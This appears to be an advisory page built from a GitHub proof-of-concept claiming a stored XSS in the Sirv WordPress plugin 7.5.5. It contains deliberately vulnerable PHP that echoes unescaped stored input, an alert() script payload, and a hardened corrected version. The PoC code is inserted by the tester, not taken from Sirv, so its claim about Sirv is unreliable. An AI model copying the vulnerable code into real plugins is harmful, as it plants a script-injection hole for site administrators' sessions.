Sirv WordPress Plugin Stored XSS Vulnerability
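Vulnerability information
Vulnerability name: Sirv WordPress Plugin Stored XSS Vulnerability
Vulnerability ID:
- CVE: CVE-2025-XXXX
Vulnerability type: Cross-site scripting
Severity: High
Vulnerability description: The Sirv WordPress plugin is an image CDN and media library management plugin, widely used on WordPress sites to optimize image loading speed and media management. Version 7.5.5 of the plugin contains a stored cross-site scripting (XSS) vulnerability that allows an attacker to inject and execute malicious JavaScript in the WordPress admin panel. The root cause is that a custom admin menu page in the plugin does not properly escape and sanitize user input, which allows an attacker to store malicious script. An attacker can use this to execute arbitrary JavaScript when an administrator visits the specific page, which may lead to session hijacking or takeover of the administrator account. Exploitation requires the attacker to have at least the 'read' capability (such as a subscriber or shop manager), but once successful the impact is broad, including but not limited to data leakage, service disruption and other security risks.
Vendor: Sirv
Product: Sirv – Image CDN & Media Library
Affected version: 7.5.5
Source: https://github.com/Bineshmadharapu29/CVE-2025-XXXX-Sirv-Stored-XSS
Type: CVE-2025:github search
Repository files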
- POC 1.png
- Poc 2.png
- README.md
- poc 3.png
- poc 4.png
- poc 5.png
- screenshots
Source overview
CVE-2025-XXXX-Sirv-Stored-XSS
Stored XSS in Sirv WordPress Plugin v7.5.5 – CVE-2025-XXXX
📛 CVE-2025-XXXX - Stored XSS in Sirv WordPress Plugin (v7.5.5)
📝 Summary
The Sirv plugin for WordPress (v7.5.5) contains a Stored Cross-Site Scripting (XSS) vulnerability in a custom admin menu page. An attacker with the 'read' capability (e.g., subscriber) can store malicious JavaScript that executes in the admin dashboard.
💥 Impact
- Persistent XSS in WordPress admin panel
- Arbitrary JavaScript execution
- Possible session hijacking or admin takeover
📂 Affected Plugin
- Plugin: Sirv – Image CDN & Media Library
- Version: 7.5.5 (latest at time of discovery)
- Tested on: WordPress 6.8.1
🧪 Exploit Steps (PoC)
1. Add this code into the plugin (or another plugin):
    // Register an admin page that any user with the 'read' capability can open.
    add_action('admin_menu', function() {
        add_menu_page('XSS Test Page', 'XSS Test', 'read', 'xss-test', 'sirv_test_xss_page');
    });
    function sirv_test_xss_page() {
        if ($_SERVER['REQUEST_METHOD'] === 'POST') {
            // The submitted value is stored without any sanitization.
            update_option('sirv_xss_payload', stripslashes($_POST['payload']));
            echo '<div class="notice notice-success"><p>Saved!</p></div>';
        }
        $stored = get_option('sirv_xss_payload');
        echo '<div class="wrap">';
        echo '<h1>XSS PoC Test Page</h1>';
        echo '<form method="POST">';
        // esc_attr() keeps the value attribute of the input field safe.
        echo '<input type="text" name="payload" style="width: 50%;" value="' . esc_attr($stored) . '">';
        echo '<br><br><input type="submit" class="button button-primary" value="Save">';
        echo '</form>';
        echo '<h2>Rendered Output:</h2>';
        // Vulnerable sink: the stored value is echoed without escaping.
        echo '<div>' . $stored . '</div>';
        echo '</div>';
    }
2. Log in as a low-privilege user (e.g., subscriber or shop manager).
3. Go to:
    http://localhost/wp-admin/admin.php?page=xss-test
4. Enter payload:
    "><script>alert('XSS')</script>
5. Log in as admin and open the page — JS will execute.
Root Cause
Unescaped and unsanitized user input rendered in admin panel:
    echo '<div>' . $stored . '</div>';
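A hardened counterpart of the PoC callback, added here as an example (it is not code from the Sirv plugin or from the original README). The function name `sirv_test_xss_page_hardened`, the nonce action `sirv_xss_save` and the choice of the `manage_options` capability are assumptions made for illustration.

```php
<?php
// Added example: hardened counterpart of the PoC callback above.
// sirv_test_xss_page_hardened and sirv_xss_save are hypothetical names.

add_action('admin_menu', function () {
    // Assumption: only administrators should reach this page.
    add_menu_page('XSS Test Page', 'XSS Test', 'manage_options', 'xss-test', 'sirv_test_xss_page_hardened');
});

function sirv_test_xss_page_hardened() {
    // Re-check the capability inside the callback, not only at menu registration.
    if (!current_user_can('manage_options')) {
        wp_die(esc_html__('You are not allowed to access this page.'));
    }

    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['payload'])) {
        // Reject forged requests: execution stops unless the nonce is valid.
        check_admin_referer('sirv_xss_save');
        // Sanitize on input: removes tags and normalizes whitespace.
        $clean = sanitize_text_field(wp_unslash($_POST['payload']));
        update_option('sirv_xss_payload', $clean);
        echo '<div class="notice notice-success"><p>Saved!</p></div>';
    }

    $stored = (string) get_option('sirv_xss_payload', '');

    echo '<div class="wrap">';
    echo '<h1>XSS PoC Test Page</h1>';
    echo '<form method="POST">';
    // Emits the hidden _wpnonce field that check_admin_referer() verifies.
    wp_nonce_field('sirv_xss_save');
    echo '<input type="text" name="payload" style="width: 50%;" value="' . esc_attr($stored) . '">';
    echo '<br><br><input type="submit" class="button button-primary" value="Save">';
    echo '</form>';
    echo '<h2>Rendered Output:</h2>';
    // Escape on output: markup in the stored value is shown as text, never parsed.
    echo '<div>' . esc_html($stored) . '</div>';
    echo '</div>';
}
```

The `esc_html()` call on output is the part that addresses the root cause: it also neutralizes any value that was stored in the option before input sanitization was added.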